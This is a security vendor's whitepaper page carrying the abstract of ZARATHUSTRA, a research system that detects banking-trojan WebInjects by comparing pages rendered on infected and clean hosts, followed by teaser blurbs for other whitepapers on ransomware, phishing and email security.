Home > Resources > Whitepapers > ZARATHUSTRA: Extracting WebInject Signatures from Banking Trojans

ZARATHUSTRA: Extracting WebInject Signatures from Banking Trojans

Modern trojans are equipped with a functionality, called WebInject, that can be used to silently modify a web page on the infected end host. Given its flexibility, WebInject-based malware is becoming a popular information-stealing mechanism. In addition, the structured and well-organized malware-as-a-service model makes revenue out of customization kits, which in turns leads to high volumes of binary variants. Analysis approaches based on memory carving to extract the decrypted webinject.txt and config.bin files at runtime make the strong assumption that the malware will never change the way such files are handled internally, and therefore are not future proof by design. In addition, developers of sensitive web applications (e.g., online banking) have no tools that they can possibly use to even mitigate the effect of WebInjects. WebInject-based trojans insert client-side code (e.g., HTML, JavaScript) while the targeted web pages (e.g., online banking website, search engine) are rendered on the browser. This additional code will capture sensitive information entered by the victim (e.g., one-time passwords) or perform other nefarious actions (e.g., click fraud or search engine result poisoning). The visible effect of a WebInject is that a web page rendered on infected clients differs from the very same page rendered on clean machines. We leverage this key observation and propose an approach to automatically characterize the WebInject behavior. Ultimately, our system can be applied to analyze a sample automatically against a set of target websites, without requiring any manual action, or to generate fingerprints that are useful to determine whether a client is infected. Differently from the state of the art, our method works regardless of how the WebInject module is implemented and requires no reverse engineering. We implemented and evaluated our approach against live online websites and a dataset of distinct variants of WebInject-based financial trojans. The results show that our approach correctly recognize known variants of WebInject-based malware with negligible false positives.

I'm For Real

Enter your details once to access all our information and resources

 

Spotlight

OpenText

OpenText is a world leader in Information Management, helping companies securely capture, govern and exchange information on a global scale. OpenText solves digital business challenges for customers, ranging from small and mid-sized businesses to the largest and most complex organizations in the world. For more information about OpenText (NASDAQ/TSX: OTEX), visit www.opentext.com

OTHER WHITEPAPERS
news image

Dell PowerScale OneFS: Security Considerations

whitePaper | December 28, 2022

In the age of Digital Transformation, organizations must adapt to modern data requirements and implement new features for the transformation life cycle. Throughout this process, protecting data is vital as it is an organization’s most valuable asset. This document describes how to maintain an aggressive security posture for a PowerScale OneFS cluster and meet industry security requirements.

Read More
news image

Systemic Cybersecurity Risk and role of the Global Community: Managing the Unmanageable

whitePaper | November 29, 2022

In February 2022, a cyberattack on commercial satellite services in Ukraine caused electricitygenerating wind farms to shut down across Central Europe. In July 2021, supermarkets in Sweden were forced to close their doors after a cyberattack on an IT services provider based in Florida, USA.

Read More
news image

Understanding Ransomware and Strategies to Defeat it

whitePaper | March 5, 2020

Held Hostage in Hollywood: In February 2016 the Hollywood Presbyterian Medical Center, in Los Angeles, paid a ransom of about US$17,000 to hackers who infiltrated and disabled its computer network with ransomware. The hospital paid the ransom of 40 Bitcoins (currently worth about $16,664) after a “network infiltration” began on February 5, when employees reported being unable to access the hospital’s network and electronic medical records system. “The malware locked access to certain computer systems and prevented us from sharing communications electronically,” said hospital CEO Allen Stefanek.

Read More
news image

How to Reduce the Risk of Phishing and Ransomware

whitePaper | March 21, 2021

Cybersecurity challenges abound for organizations across the world. The tsunami of phishing attacks that threaten account compromise, data breaches and malware infection remains a critical threat to neutralize. Ransomware is a second critical threat, with a well-played ransomware attack capable of bringing an organization to a complete halt, and in some cases putting it out of business permanently (e.g., Travelex1 and Vastaamo2.

Read More
news image

Cisco Secure Email Buyer's Guide

whitePaper | October 20, 2022

Organizations continue to face a daunting challenge. Email is simultaneously the most important business communication tool and the leading attack vector for security breaches. The ubiquitous, and casual, use of email makes it the perfect avenue to deliver threat-centric content, insert malware into corporate systems, steal data, and extort money.

Read More
news image

N-able N-central Security White Paper

whitePaper | June 22, 2023

As an integral component of your IT management system, N-able N-central® complements an organization’s existing security policies and infrastructures. N-able N-central consists of a number of components that were specifically designed to provide flexibility as well as to ensure the integrity of the security of the networks on which N-able Ncentral operates.

Read More

Dell PowerScale OneFS: Security Considerations

whitePaper | December 28, 2022

In the age of Digital Transformation, organizations must adapt to modern data requirements and implement new features for the transformation life cycle. Throughout this process, protecting data is vital as it is an organization’s most valuable asset. This document describes how to maintain an aggressive security posture for a PowerScale OneFS cluster and meet industry security requirements.

Read More

Systemic Cybersecurity Risk and role of the Global Community: Managing the Unmanageable

whitePaper | November 29, 2022

In February 2022, a cyberattack on commercial satellite services in Ukraine caused electricitygenerating wind farms to shut down across Central Europe. In July 2021, supermarkets in Sweden were forced to close their doors after a cyberattack on an IT services provider based in Florida, USA.

Read More

Understanding Ransomware and Strategies to Defeat it

whitePaper | March 5, 2020

Held Hostage in Hollywood: In February 2016 the Hollywood Presbyterian Medical Center, in Los Angeles, paid a ransom of about US$17,000 to hackers who infiltrated and disabled its computer network with ransomware. The hospital paid the ransom of 40 Bitcoins (currently worth about $16,664) after a “network infiltration” began on February 5, when employees reported being unable to access the hospital’s network and electronic medical records system. “The malware locked access to certain computer systems and prevented us from sharing communications electronically,” said hospital CEO Allen Stefanek.

Read More

How to Reduce the Risk of Phishing and Ransomware

whitePaper | March 21, 2021

Cybersecurity challenges abound for organizations across the world. The tsunami of phishing attacks that threaten account compromise, data breaches and malware infection remains a critical threat to neutralize. Ransomware is a second critical threat, with a well-played ransomware attack capable of bringing an organization to a complete halt, and in some cases putting it out of business permanently (e.g., Travelex1 and Vastaamo2.

Read More

Cisco Secure Email Buyer's Guide

whitePaper | October 20, 2022

Organizations continue to face a daunting challenge. Email is simultaneously the most important business communication tool and the leading attack vector for security breaches.

The ubiquitous, and casual, use of email makes it the perfect avenue to deliver threat-centric content, insert malware into corporate systems, steal data, and extort money.

Read More

N-able N-central Security White Paper

whitePaper | June 22, 2023

As an integral component of your IT management system, N-able N-central® complements an organization’s existing security policies and infrastructures. N-able N-central consists of a number of components that were specifically designed to provide flexibility as well as to ensure the integrity of the security of the networks on which N-able Ncentral operates.

Read More
More Whitepapers

Spotlight

OpenText

OpenText is a world leader in Information Management, helping companies securely capture, govern and exchange information on a global scale. OpenText solves digital business challenges for customers, ranging from small and mid-sized businesses to the largest and most complex organizations in the world. For more information about OpenText (NASDAQ/TSX: OTEX), visit www.opentext.com

Events

Cybersecurity Expo

Conference